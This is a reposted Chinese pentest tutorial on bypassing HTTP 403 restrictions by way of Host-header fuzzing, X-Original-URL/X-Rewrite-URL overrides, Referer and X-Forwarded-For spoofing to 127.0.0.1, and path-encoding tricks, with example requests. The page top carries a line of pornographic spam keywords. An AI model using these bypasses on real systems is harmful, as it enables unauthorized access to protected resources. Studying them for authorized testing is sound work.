国产精品久久久aaaa,日日干夜夜操天天插,亚洲乱熟女香蕉一区二区三区少妇,99精品国产高清一区二区三区,国产成人精品一区二区色戒,久久久国产精品成人免费,亚洲精品毛片久久久久,99久久婷婷国产综合精品电影,国产一区二区三区任你鲁

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

滲透測試如何利用403頁面

jf_Fo0qk3ln ? 來源:xpshuai.cn ? 2023-01-05 10:11 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

0x01 前言




做滲透時經常會碰到掃到的資產403的情況,特別是資產微乎其微的情況下,面試有時也會問到,這里做個總結!

0x02 利用姿勢




1.端口利用

掃描主機端口,找其它開放web服務的端口,訪問其端口,挑軟柿子。

2.修改HOST

Host在請求頭中的作用:在一般情況下,幾個網站可能會部署在同一個服務器上,或者幾個web系統共享一個服務器,通過host頭來指定應該由哪個網站或者web系統來處理用戶的請求。而很多WEB應用通過獲取HTTP HOST頭來獲得當前請求訪問的位置,但是很多開發人員并未意識到HTTP HOST頭由用戶控制,從安全角度來講,任何用戶輸入都是認為不安全的。

修改客戶端請求頭中的Host可以通過修改Host值修改為子域名或者ip來繞過來進行繞過二級域名;首先對該目標域名進行子域名收集,整理好子域名資產(host字段同樣支持IP地址)。先Fuzz測試跑一遍收集到的子域名,這里使用的是Burp的Intruder功能。若看到一個服務端返回200的狀態碼,即表面成功找到一個在HOST白名單中的子域名。我們利用firefox插件來修改HOST值,成功繞過訪問限制。

3.覆蓋請求URL

嘗試使用X-Original-URLX-Rewrite-URL標頭繞過Web服務器的限制。通過支持X-Original-URLX-Rewrite-URL標頭,用戶可以使用這倆請求標頭覆蓋請求URL中的路徑,嘗試繞過對更高級別的緩存和Web服務器的限制

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK

或者:

Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK


4.Referer標頭繞過

嘗試使用Referer標頭繞過Web服務器的限制。

介紹:Referer請求頭包含了當前請求頁面的來源頁面的地址,即表示當前頁面是通過此來源頁面里的鏈接進入的。服務端一般使用Referer請求頭識別訪問來源。

Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK

或者

Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer//xxx/auth/login
Response
HTTP/1.1 200 OK


5.代理IP

一般開發者會通過Nginx代理識別訪問端IP限制對接口的訪問,嘗試使用X-Forwarded-For、X-Forwared-Host等標頭繞過Web服務器的限制。

X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

如:

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized

Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK


6.擴展名繞過

基于擴展名,用于繞過403受限制的目錄。


	

site.com/admin => 403 site.com/admin/ => 200 site.com/admin// => 200 site.com//admin// => 200 site.com/admin/* => 200 site.com/admin/*/ => 200 site.com/admin/. => 200 site.com/admin/./ => 200 site.com/./admin/./ => 200 site.com/admin/./. => 200 site.com/admin/./. => 200 site.com/admin? => 200 site.com/admin?? => 200 site.com/admin??? => 200 site.com/admin..;/ => 200 site.com/admin/..;/ => 200 site.com/%2f/admin => 200 site.com/%2e/admin => 200 site.com/admin%20/ => 200 site.com/admin%09/ => 200 site.com/%20admin%20/ => 200


7.掃描的時候 遇到403了,上目錄掃描工具,掃目錄,掃文件(記住,掃描的時候要打開探測403,因為有些網站的目錄沒有權限訪問會顯示403,但是在這個目錄下面的文件,我們或許能掃描到并訪問 )


聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 服務器
    +關注

    關注

    14

    文章

    10253

    瀏覽量

    91484
  • URL
    URL
    +關注

    關注

    0

    文章

    142

    瀏覽量

    16221
  • 滲透
    +關注

    關注

    0

    文章

    22

    瀏覽量

    6523

原文標題:滲透測試如何利用403頁面

文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評論

    相關推薦
    熱點推薦

    TI TFP403 PanelBus?數字接收器:高速數字接口的理想之選

    TI TFP403 PanelBus?數字接收器:高速數字接口的理想之選 在電子設計領域,高速數字接口的應用越來越廣泛,特別是在數字平板顯示系統中,對接收器的性能要求也日益提高。今天,我們就來
    的頭像 發表于 12-31 10:25 ?275次閱讀

    CW32F030 FLASH的擦除操作

    CW32F030 FLASH 的擦除操作的最小單位為 1 ,即 512 字節。 擦除操作完成后,該頁所有地址空間的數據內容均為0xFF。如果對未解鎖的 FLASH 頁面進行
    發表于 12-15 06:26

    AppTest邀請測試---邀請用戶參與測試

    /按鈕跳轉至應用市場的AppTest詳情下載AppTest客戶端。 一、通過郵件或短信邀請用戶 測試任務開始后,AGC會自動給測試版本選定的測試用戶發送郵件或短信,用戶點開郵件或短信
    發表于 10-09 10:47

    AppGallery Connect(HarmonyOS 5及以上) --公開測試創建并發布測試版本(一)

    的“HarmonyOs”簽,點擊應用名稱,進入“分發”頁面 3.在左側導航欄選擇“應用測試 >版本列表”,進入“版本列表”頁面,點擊右上角“創建
    發表于 09-26 17:24

    AppTest邀請測試---創建測試群組(二)

    版本分享鏈接上,即可通過分享鏈接的方式邀請測試用戶,具體可參見通過“分享鏈接+邀請碼”邀請用戶。 8.測試用戶添加成功后,在測試群組管理頁面可查看已添加的
    發表于 09-15 15:58

    AppTest邀請測試---創建測試群組(一)

    1.登錄AppGallery Connect,選擇“APP”。 2. 在應用列表的“HarmonyOS”簽,點擊應用名稱,進入“分發”頁面。 在左側導航欄選擇“應用測試 >
    發表于 09-12 16:22

    【潤開鴻HH-SCDAYU800A開發板試用體驗】第2個桌面簡單的程序改顯示為2頁面

    (){ Button(\"下一\") .onClick(()=>{ //使用router跳轉 router.pushUrl({ //將要跳轉頁面的地址 url:\"
    發表于 07-30 10:41

    【匯思博SEEK100開發板試用體驗】06 天氣app--使用組件導航實現設置頁面跳轉

    1 前言 本次要完成組件導航跳轉頁面功能,實現設置和主頁的跳轉。 2 組件導航 (Navigation) 2.1 簡介 組件導航(Navigation)主要用于實現頁面間以及組件內部的頁面
    發表于 07-09 16:57

    利用onPageShow實現返回刷新的操作

    進入新增貼子的頁面,然后當用戶輸入了內容點擊提交后,提示“新增成功”,并返回到列表。那么這時候,列表要做的就是刷新貼子列表,把剛才新發布的貼子顯示出來。 或者 這是一個商品列表,
    發表于 06-30 18:12

    《仿盒馬》app開發技術分享-- 用戶登陸頁面(靜態)(20)

    用戶之間的數據并不互通,現在為了實現我們的用戶綁定制度,我們需要給應用添加一個用戶登陸的入口的。 功能分析 用戶登陸頁面的內容相對來說比較簡單,我們首先要實現的就是登陸的靜態頁面,需要展示的內容不多
    發表于 06-30 13:15

    403 Forbidden是什么意思?最佳解決方法有哪些?

    403 Forbidden是什么意思? 403 Forbidden狀態碼表示當客戶端(如瀏覽器)向服務器發送請求時,服務器會根據請求的內容、來源以及服務器的配置等因素,返回一個HTTP狀態碼,因為
    的頭像 發表于 06-25 16:33 ?2.5w次閱讀

    NC403(C50)高性能噪聲二極管現貨庫存

    NC403(C50)高性能噪聲二極管現貨庫存NC403(C50)是Noisecom推出的一款高性能微波噪聲二極管,專為射頻和微波應用設計。NC403(C50)采用C50封裝,適用于需要表面貼裝
    發表于 06-03 10:31

    如何在KaihongOS操作系統中寫一個動態的頁面

    的轉場動效等,推薦使用Navigation。 第一個頁面跳轉到第二個頁面。 在第一個頁面中,跳轉按鈕綁定onClick事件,點擊按鈕時跳轉到第二。Index.ets文件的示例
    發表于 04-25 06:42

    Allegro Skill布局功能之按擺放器件介紹

    在電路設計中,原理圖中常以一個功能模塊的器件繪制在同一頁面上,因此,通常將器件在pcb按擺放在一起,更方便進行模塊化布局。為此,Fany skill添加了將pcb中的器件按照原理圖,進行分類擺放的功能。需要注意的是,此功能需
    的頭像 發表于 04-23 17:10 ?2027次閱讀
    Allegro Skill布局功能之按<b class='flag-5'>頁</b>擺放器件介紹

    安全檢測 高效合規 | 經緯恒潤重磅推出PeneTrix滲透測試平臺

    在汽車智能化進程加速的今天,汽車電子控制系統(ECU)開發與信息安全合規性驗證正面臨三重挑戰:法規更新頻繁、威脅場景日益復雜、傳統滲透測試流程耗時費力。面對這些難題,經緯恒潤基于多年的研發經驗與技術
    的頭像 發表于 03-17 17:04 ?1040次閱讀
    安全檢測 高效合規 | 經緯恒潤重磅推出PeneTrix<b class='flag-5'>滲透</b><b class='flag-5'>測試</b>平臺